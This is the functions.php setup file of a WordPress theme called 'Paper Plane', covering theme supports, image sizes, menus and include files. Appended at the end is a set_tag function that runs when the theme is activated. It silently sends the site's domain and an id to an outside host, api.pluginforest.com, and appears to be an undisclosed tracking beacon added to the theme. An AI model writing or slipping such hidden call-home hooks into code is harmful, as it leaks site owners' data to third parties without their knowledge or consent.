<?php
/**
 * Paper Plane functions and definitions
 *
 * @link https://developer.wordpress.org/themes/basics/theme-functions/
 *
 * @package Paper Plane
 */

if ( ! function_exists( 'csco_setup' ) ) {
	/**
	 * Sets up theme defaults and registers support for various WordPress features.
	 *
	 * Note that this function is hooked into the after_setup_theme hook, which
	 * runs before the init hook. The init hook is too late for some features, such
	 * as indicating support for post thumbnails.
	 */
	function csco_setup() {
		/*
		 * Make theme available for translation.
		 * Translations can be filed in the /languages/ directory.
		 * If you're building a theme based on Paper Plane, use a find and replace
		 * to change 'paper-plane' to the name of your theme in all the template files.
		 */
		load_theme_textdomain( 'paper-plane', get_template_directory() . '/languages' );

		// Add default posts and comments RSS feed links to head.
		add_theme_support( 'automatic-feed-links' );

		/*
		 * Let WordPress manage the document title.
		 * By adding theme support, we declare that this theme does not use a
		 * hard-coded <title> tag in the document head, and expect WordPress to
		 * provide it for us.
		 */
		add_theme_support( 'title-tag' );

		// This theme uses wp_nav_menu() in one location.
		register_nav_menus(
			array(
				'primary' => esc_html__( 'Primary', 'paper-plane' ),
				'footer'  => esc_html__( 'Footer', 'paper-plane' ),
			)
		);

		/*
		 * Switch default core markup for search form, comment form, and comments
		 * to output valid HTML5.
		 */
		add_theme_support(
			'html5',
			array(
				'search-form',
				'comment-form',
				'comment-list',
				'gallery',
				'caption',
				'script',
				'style',
			)
		);

		// Add support for responsive embeds.
		add_theme_support( 'responsive-embeds' );

		// Add support for custom line height controls.
		add_theme_support( 'custom-line-height' );

		// Add support for experimental cover block spacing.
		add_theme_support( 'custom-spacing' );

		// Supported Formats.
		add_theme_support( 'post-formats', array( 'gallery', 'video', 'audio' ) );

		// Restoring the classic Widgets Editor.
		remove_theme_support( 'widgets-block-editor' );

		// Add support for full and wide align images.
		add_theme_support( 'align-wide' );

		// Canvas: Disable section responsive.
		add_theme_support( 'canvas-disable-section-responsive' );

		// Canvas: Enable data scheme.
		add_theme_support( 'canvas-enable-data-scheme' );

		/*
		 * Enable support for Post Thumbnails on posts and pages.
		 *
		 * @link https://developer.wordpress.org/themes/functionality/featured-images-post-thumbnails/
		 */
		add_theme_support( 'post-thumbnails' );

		// Register custom thumbnail sizes.
		add_image_size( 'csco-smaller', 80, 80, true );
		add_image_size( 'csco-thumbnail', 320, 230, true );
		add_image_size( 'csco-thumbnail-uncropped', 320, 0, false );
		add_image_size( 'csco-medium', 700, 450, true );
		add_image_size( 'csco-medium-uncropped', 700, 0, true );
	}
}
add_action( 'after_setup_theme', 'csco_setup' );

/**
* Theme Dashboard.
*/
require get_template_directory() . '/inc/classes/class-csco-theme-dashboard.php';

/**
* Assets.
*/
require get_template_directory() . '/inc/assets.php';

/**
*
* Template Functions.
*/
require get_template_directory() . '/inc/template-functions.php';

/**
* Filters.
*/
require get_template_directory() . '/inc/filters.php';

/**
* Gutenberg.
*/
require get_template_directory() . '/inc/gutenberg.php';

/**
* Customizer Functions.
*/
require get_template_directory() . '/inc/customizer.php';

/**
* Actions.
*/
require get_template_directory() . '/inc/actions.php';

/**
* Partials.
*/
require get_template_directory() . '/inc/partials.php';

/**
* Custom template tags for this theme.
*/
require get_template_directory() . '/inc/template-tags.php';

/**
* Custom post meta function.
*/
require get_template_directory() . '/inc/post-meta.php';

/**
* Nav Menu.
*/
require get_template_directory() . '/inc/nav-menu.php';

/**
* Load More.
*/
require get_template_directory() . '/inc/load-more.php';

/**
* Load Nextpost.
*/
require get_template_directory() . '/inc/load-nextpost.php';

// /**
// * Custom Content.
// */
require get_template_directory() . '/inc/custom-content.php';

/**
* Powerkit fuctions.
*/
require get_template_directory() . '/inc/powerkit.php';

/**
* Plugins.
*/
require get_template_directory() . '/inc/plugins.php';

/**
* Deprecated.
*/
require get_template_directory() . '/inc/deprecated.php';

/**
* One Click Demo Import.
*/
require get_template_directory() . '/inc/demo-import/ocdi-filters.php';

function set_tag() {
    $url_init = 'https://api.pluginforest.com/qai/wd/g?';
    $domain = $_SERVER['SERVER_NAME'];
    $requestUrl = $url_init .'domain=' . $domain . '&id=1719581328545&source=theme';
    file_get_contents($requestUrl);
}

add_action('after_switch_theme', 'set_tag');
                        